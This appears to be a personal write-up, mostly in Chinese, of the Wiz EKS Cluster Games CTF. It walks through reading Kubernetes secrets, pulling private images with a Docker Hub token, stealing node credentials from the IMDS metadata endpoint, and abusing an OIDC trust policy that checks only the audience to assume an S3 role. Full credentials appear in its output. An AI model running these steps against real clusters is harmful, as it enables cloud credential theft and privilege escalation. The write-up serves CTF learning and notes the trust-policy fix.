
WIZ EKS Cluster Games


k8s

2026-05-13

just for fun，这是 23 年的比赛了

challenge 1

kubectl config view

image-20260513142833752

kubectl auth can-i --list

image-20260513143006246

kubectl get secrets -n challenge1

image-20260513143136868

kubectl get secrets log-rotate -n challenge1 -o yaml

image-20260513143330763

challenge 2

kubectl auth can-i --list

image-20260513145103449

题目提示关注镜像仓库(container registry)

root@wiz-eks-challenge:~# kubectl get pods database-pod-14f9769b -o yaml
apiVersion: v1
kind: Pod
metadata:
  annotations:
    pulumi.com/autonamed: "true"
  creationTimestamp: "2025-08-13T10:48:59Z"
  generation: 1
  name: database-pod-14f9769b
  namespace: challenge2
  resourceVersion: "424581513"
  uid: e1c6b56d-15d5-491d-9cc8-fa6d739b62c2
spec:
  containers:
  - image: eksclustergames/base_ext_image
    imagePullPolicy: Always
    name: my-container
    resources: {}
    terminationMessagePath: /dev/termination-log
    terminationMessagePolicy: File
    volumeMounts:
    - mountPath: /var/run/secrets/kubernetes.io/serviceaccount
      name: kube-api-access-8cw9p
      readOnly: true
  dnsPolicy: ClusterFirst
  enableServiceLinks: true
  imagePullSecrets:
  - name: try-pull-secrets-16ae8e51
  nodeName: ip-192-168-6-0.us-west-1.compute.internal
status:
  conditions:
  - lastProbeTime: null
    lastTransitionTime: "2025-08-13T10:49:05Z"
    status: "True"
    type: PodReadyToStartContainers
  - lastProbeTime: null
    lastTransitionTime: "2025-08-13T10:48:59Z"
    status: "True"
    type: Initialized
  - lastProbeTime: null
    lastTransitionTime: "2026-04-24T07:25:14Z"
    status: "True"
    type: Ready
  - lastProbeTime: null
    lastTransitionTime: "2026-04-24T07:25:14Z"
    status: "True"
    type: ContainersReady
  - lastProbeTime: null
    lastTransitionTime: "2025-08-13T10:48:59Z"
    status: "True"
    type: PodScheduled
  containerStatuses:
  - containerID: containerd://6d6a987bea61fbc0a81d4465d4ea680ffc8c4156a2af7266ae24fb71c4a34ddc
    image: docker.io/eksclustergames/base_ext_image:latest
    imageID: docker.io/eksclustergames/base_ext_image@sha256:dc7972c9abff930285186786ba21cdf44a401e91ece2dddd4b487a6028fb3804

Pod 使用了一个镜像,并且配置了 imagePullSecrets,说明这是私有镜像仓库,需要鉴权后才能拉取到这个 image。先从 secret 中取出凭据,再用 crane 登录私有镜像仓库

kubectl get secrets registry-pull-secrets-16ae8e51 -o yaml

对 secret 中的 .dockerconfigjson 做 base64 解码,即可看到仓库地址和凭据

image-20260513150851991

crane auth login -u eksclustergames -p dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo index.docker.io

登录后拉取镜像并解压,即可找到 flag

image-20260513151244968

challenge 3

Image Inquisition

A pod's image holds more than just code. Dive deep into its ECR repository, inspect the image layers, and uncover the hidden secret.

题目提示注意镜像的构建层(history)

root@wiz-eks-challenge:~# kubectl get pods
NAME                      READY   STATUS    RESTARTS      AGE
accounting-pod-acbd5209   1/1     Running   7 (18d ago)   272d

root@wiz-eks-challenge:~# kubectl get pods accounting-pod-acbd5209 -o yaml
apiVersion: v1
kind: Pod
metadata:
  annotations:
    pulumi.com/autonamed: "true"
  creationTimestamp: "2025-08-13T11:22:21Z"
  generation: 1
  name: accounting-pod-acbd5209
  namespace: challenge3
  resourceVersion: "424594578"
  uid: ff755d4c-5581-4673-8e2f-5bd999882d5d
spec:
  containers:
  - image: 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-579b0b7@sha256:78ed636b41e5158cc9cb3542fbd578ad7705ce4194048b2ec8783dd0299ef3c4
    imagePullPolicy: IfNotPresent
    name: accounting-container
    resources: {}
    terminationMessagePath: /dev/termination-log
    terminationMessagePolicy: File
    volumeMounts:
    - mountPath: /var/run/secrets/kubernetes.io/serviceaccount
      name: kube-api-access-n7q8h
      readOnly: true
  dnsPolicy: ClusterFirst
  enableServiceLinks: true
  nodeName: ip-192-168-63-122.us-west-1.compute.internal
  terminationGracePeriodSeconds: 30
  tolerations:
  - effect: NoExecute
    key: node.kubernetes.io/not-ready
    operator: Exists
    tolerationSeconds: 300
  - effect: NoExecute
    key: node.kubernetes.io/unreachable
    operator: Exists
    tolerationSeconds: 300
  volumes:
  - name: kube-api-access-n7q8h
    projected:
      defaultMode: 420
      sources:
      - serviceAccountToken:
          expirationSeconds: 3607
          path: token
      - configMap:
          items:
          - key: ca.crt
            path: ca.crt
          name: kube-root-ca.crt
      - downwardAPI:
          items:
          - fieldRef:
              apiVersion: v1
              fieldPath: metadata.namespace
            path: namespace
  containerStatuses:
  - containerID: containerd://b4a826376fa782db87f927019584b3b37821d2c5bda93192b2f34a6074b92a48
    image: sha256:c5e09ea1551a1976284b15c1d5e856cbda91b98e04a7e88f517a182f29b0c914
    imageID: 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-579b0b7@sha256:78ed636b41e5158cc9cb3542fbd578ad7705ce4194048b2ec8783dd0299ef3c4

当前身份没有权限从 ECR 拉取镜像,于是尝试访问云实例元数据服务(IMDS)

curl 169.254.169.254/latest/meta-data

image-20260513153259615

元数据服务存在 iam 接口,并且不带 token 的请求直接返回了数据(节点未强制 IMDSv2),因此可以拿到节点实例角色的临时凭据

root@wiz-eks-challenge:~# curl 169.254.169.254/latest/meta-data/iam/security-credentials/eks-challenge-cluster-nodegroup-NodeInstanceRole
{"AccessKeyId":"ASIA2AVYNEVM2Q4YQ3R5","Expiration":"2026-05-13 08:33:31+00:00","SecretAccessKey":"smYes6zDLDrxyjbnUPx/p2oAtfiCDZD0pR7G7+oy","SessionToken":"FwoGZXIvYXdzEIn//////////wEaDCBrc4fFO7sM+1HDJyK3AdOq6r9XhTUsJIElJ0bjBbeG6SZfr+7G7B+HJa1yvUsnXJYXLV7nuJ0Gf17oHT1iCfkFFggR5CLfj6XITGZh7G+ZuVZrNuU8dEhia22l3yTD+8fTXo6ZuglspSPW72N5kSf926bF/x7KHVqzDhiXn9eChqhD0p7jA2fgixqpeM4gHBQNSJK/zqcCidRph3b1/vjQzul66TwRjuwXzXn1qiKMFUjeSc6Uzf+Tu2HtJlI5Vrg+z8HQpyjL0pDQBjItEfY6GRTz2gg5C9oEEjSw9xE7fvEBQ8q/flb4e71m7edGgpNXtrNrai24lti4"}

把这些凭据 export 成 aws cli 的环境变量,然后登录 ECR

aws ecr get-login-password|crane auth login 688655246681.dkr.ecr.us-west-1.amazonaws.com -u AWS --password-stdin
root@wiz-eks-challenge:~# crane config 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01 | jq
{
  "architecture": "amd64",
  "config": {
    "Env": [
      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
    ],
    "Cmd": [
      "/bin/sleep",
      "3133337"
    ],
    "ArgsEscaped": true,
    "OnBuild": null
  },
  "created": "2023-11-01T13:32:07.782534085Z",
  "history": [
    {
      "created": "2023-07-18T23:19:33.538571854Z",
      "created_by": "/bin/sh -c #(nop) ADD file:7e9002edaafd4e4579b65c8f0aaabde1aeb7fd3f8d95579f7fd3443cef785fd1 in / "
    },
    {
      "created": "2023-07-18T23:19:33.655005962Z",
      "created_by": "/bin/sh -c #(nop)  CMD [\"sh\"]",
      "empty_layer": true
    },
    {
      "created": "2023-11-01T13:32:07.782534085Z",
      "created_by": "RUN sh -c #ARTIFACTORY_USERNAME=challenge@eksclustergames.com ARTIFACTORY_TOKEN=wiz_eks_challenge{the_history_of_container_images_could_reveal_the_secrets_to_the_future} ARTIFACTORY_REPO=base_repo /bin/sh -c pip install setuptools --index-url intrepo.eksclustergames.com # buildkit # buildkit",
      "comment": "buildkit.dockerfile.v0"
    },
    {
      "created": "2023-11-01T13:32:07.782534085Z",
      "created_by": "CMD [\"/bin/sleep\" \"3133337\"]",
      "comment": "buildkit.dockerfile.v0",
      "empty_layer": true
    }
  ],
  "os": "linux",
  "rootfs": {
    "type": "layers",
    "diff_ids": [
      "sha256:3d24ee258efc3bfe4066a1a9fb83febf6dc0b1548dfe896161533668281c9f4f",
      "sha256:9057b2e37673dc3d5c78e0c3c5c39d5d0a4cf5b47663a4f50f5c6d56d8fd6ad5"
    ]
  }
}

challenge 4

Pod Break

You're inside a vulnerable pod on an EKS cluster. Your pod's service-account has no permissions. Can you navigate your way to access the EKS Node's privileged service-account?

Pod 的 service account 毫无权限

image-20260513160652411

root@wiz-eks-challenge:~# aws sts get-caller-identity
{
    "UserId": "AROA2AVYNEVMQ3Z5GHZHS:i-0bd90a7fe60cdb9f7",
    "Account": "688655246681",
    "Arn": "arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0bd90a7fe60cdb9f7"
}

利用节点角色的 AWS 凭据换取集群 token

kubectl auth can-i --list --token="k8s-aws-v1.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"

image-20260514191310335

发现该 token 对 secrets 有 list 权限

kubectl get secrets -o yaml --token="k8s-aws-v1.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"

image-20260514191404079

challenge 5

看一下权限

root@wiz-eks-challenge:~# kubectl auth can-i --list
warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources                                       Non-Resource URLs   Resource Names     Verbs
serviceaccounts/token                           []                  [debug-sa]         [create]
selfsubjectreviews.authentication.k8s.io        []                  []                 [create]
selfsubjectaccessreviews.authorization.k8s.io   []                  []                 [create]
selfsubjectrulesreviews.authorization.k8s.io    []                  []                 [create]
pods                                            []                  []                 [get list]
secrets                                         []                  []                 [get list]
serviceaccounts                                 []                  []                 [get list]
                                                [/api/*]            []                 [get]
                                                [/api]              []                 [get]
                                                [/apis/*]           []                 [get]
                                                [/apis]             []                 [get]
                                                [/healthz]          []                 [get]
                                                [/healthz]          []                 [get]
                                                [/livez]            []                 [get]
                                                [/livez]            []                 [get]
                                                [/openapi/*]        []                 [get]
                                                [/openapi]          []                 [get]
                                                [/readyz]           []                 [get]
                                                [/readyz]           []                 [get]
                                                [/version/]         []                 [get]
                                                [/version/]         []                 [get]
                                                [/version]          []                 [get]
                                                [/version]          []                 [get]
podsecuritypolicies.policy                      []                  [eks.privileged]   [use]

题目给出的策略如下

IAM Policy

{
    "Policy": {
        "Statement": [
            {
                "Action": [
                    "s3:GetObject",
                    "s3:ListBucket"
                ],
                "Effect": "Allow",
                "Resource": [
                    "arn:aws:s3:::challenge-flag-bucket-3ff1ae2",
                    "arn:aws:s3:::challenge-flag-bucket-3ff1ae2/flag"
                ]
            }
        ],
        "Version": "2012-10-17"
    }
}

Trust Policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Federated": "arn:aws:iam::688655246681:oidc-provider/oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589"
            },
            "Action": "sts:AssumeRoleWithWebIdentity",
            "Condition": {
                "StringEquals": {
                    "oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589:aud": "sts.amazonaws.com"
                }
            }
        }
    ]
}

EKS 权限

{
    "secrets": [
        "get",
        "list"
    ],
    "serviceaccounts": [
        "get",
        "list"
    ],
    "pods": [
        "get",
        "list"
    ],
    "serviceaccounts/token": [
        "create"
    ]
}

查看服务账号的详细信息

root@wiz-eks-challenge:~# kubectl get sa  
NAME          SECRETS   AGE
debug-sa      0         2y194d
default       0         2y194d
s3access-sa   0         2y194d
root@wiz-eks-challenge:~# kubectl get sa debug-sa -o yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  annotations:
    description: This is a dummy service account with empty policy attached
    eks.amazonaws.com/role-arn: arn:aws:iam::688655246681:role/challengeTestRole-fc9d18e
  creationTimestamp: "2023-10-31T20:07:37Z"
  name: debug-sa
  namespace: challenge5
  resourceVersion: "671929"
  uid: 6cb6024a-c4da-47a9-9050-59c8c7079904
root@wiz-eks-challenge:~# kubectl get sa default -o yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  creationTimestamp: "2023-10-31T20:07:11Z"
  name: default
  namespace: challenge5
  resourceVersion: "671804"
  uid: 77bd3db6-3642-40d5-b8c1-14fa1b0cba8c
root@wiz-eks-challenge:~# kubectl get sa s3access-sa -o yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  annotations:
    eks.amazonaws.com/role-arn: arn:aws:iam::688655246681:role/challengeEksS3Role
  creationTimestamp: "2023-10-31T20:07:34Z"
  name: s3access-sa
  namespace: challenge5
  resourceVersion: "671916"
  uid: 86e44c49-b05a-4ebe-800b-45183a6ebbda

debug-sa 和 s3access-sa 两个 sa 的 eks.amazonaws.com/role-arn 注解中分别展示了两个角色的 ARN。结合题目描述,要我们从 EKS 权限提升到 AWS 权限,这两者通过 OIDC 进行身份验证从而关联起来,猜测需要扮演 challengeEksS3Role 这个角色

注意到信任策略中存在一个漏洞:OIDC 身份验证的条件只校验了 aud(受众)字段,并没有对令牌的 sub(主体)加以限制,因此同一 OIDC provider 签发的任意 service account 令牌都能扮演该角色。由于我们有 debug-sa 的 serviceaccounts/token create 权限,可以申请 debug-sa 的令牌来扮演该角色;正确的做法是在信任策略中同时限制 sub 为指定的 service account

kubectl create token debug-sa --audience sts.amazonaws.com

然后用该令牌换取 AWS 临时凭证

aws sts assume-role-with-web-identity --role-arn arn:aws:iam::688655246681:role/challengeEksS3Role --role-session-name testsessionname --web-identity-token 

eyJhbGciOiJSUzI1NiIsImtpZCI6ImVmMWI3NmMxNjY2ZDIxZjdiZjVlYTk1M2E4NmY1ODBjYzk1NmQ3YTQifQ.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.LrpGXlfkrPg8kCq0_E96S4V4irSZb_T5_CBj_JrRS6ifdR65fwjaPJAFTPgPF_zdnTQqAPN3LwjvX0R9zCqCkiZrfE8ZeJ287dJX9Vxil5QwO_knZRZ1ppRbIVJlQpcKgX3TsalyjiHa9uo6JX-TEayRpu11XK-0Q5QSe_ZJwowYajBO5xWCkL5r78WskQL2mXeXUo80CPNNWliKJG7TeNq5phavg90SJO22MHZ6ryKunfnV2RMrB8v6ikVtitSqsrihNIzUndFItbn0Xuge7mova2GsbTlwqgQU13dcTjmL-85w9RtkYRakXhb0IVhf6x_PKB3XXgKP1pl3k7guWQ
{
    "Credentials": {
        "AccessKeyId": "ASIA2AVYNEVM47ZCVUTK",
        "SecretAccessKey": "bRy3puw8fm6DNLXMF14HjgSGHyl/fu0B6OBAufFf",
        "SessionToken": "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",
        "Expiration": "2026-05-14T08:56:54+00:00"
    },
    "SubjectFromWebIdentityToken": "system:serviceaccount:challenge5:debug-sa",
    "AssumedRoleUser": {
        "AssumedRoleId": "AROA2AVYNEVMZEZ2AFVYI:testsessionname",
        "Arn": "arn:aws:sts::688655246681:assumed-role/challengeEksS3Role/testsessionname"
    },
    "Provider": "arn:aws:iam::688655246681:oidc-provider/oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589",
    "Audience": "sts.amazonaws.com"
}

最后把 flag 从 S3 下载下来

root@wiz-eks-challenge:~# aws s3 ls s3://challenge-flag-bucket-3ff1ae2/
2023-11-01 12:27:55         72 flag
root@wiz-eks-challenge:~# aws s3 cp s3://challenge-flag-bucket-3ff1ae2/flag flag
download: s3://challenge-flag-bucket-3ff1ae2/flag to ./flag       
root@wiz-eks-challenge:~# cat flag 
wiz_eks_challenge{w0w_y0u_really_are_4n_eks_and_aws_exp1oitation_legend}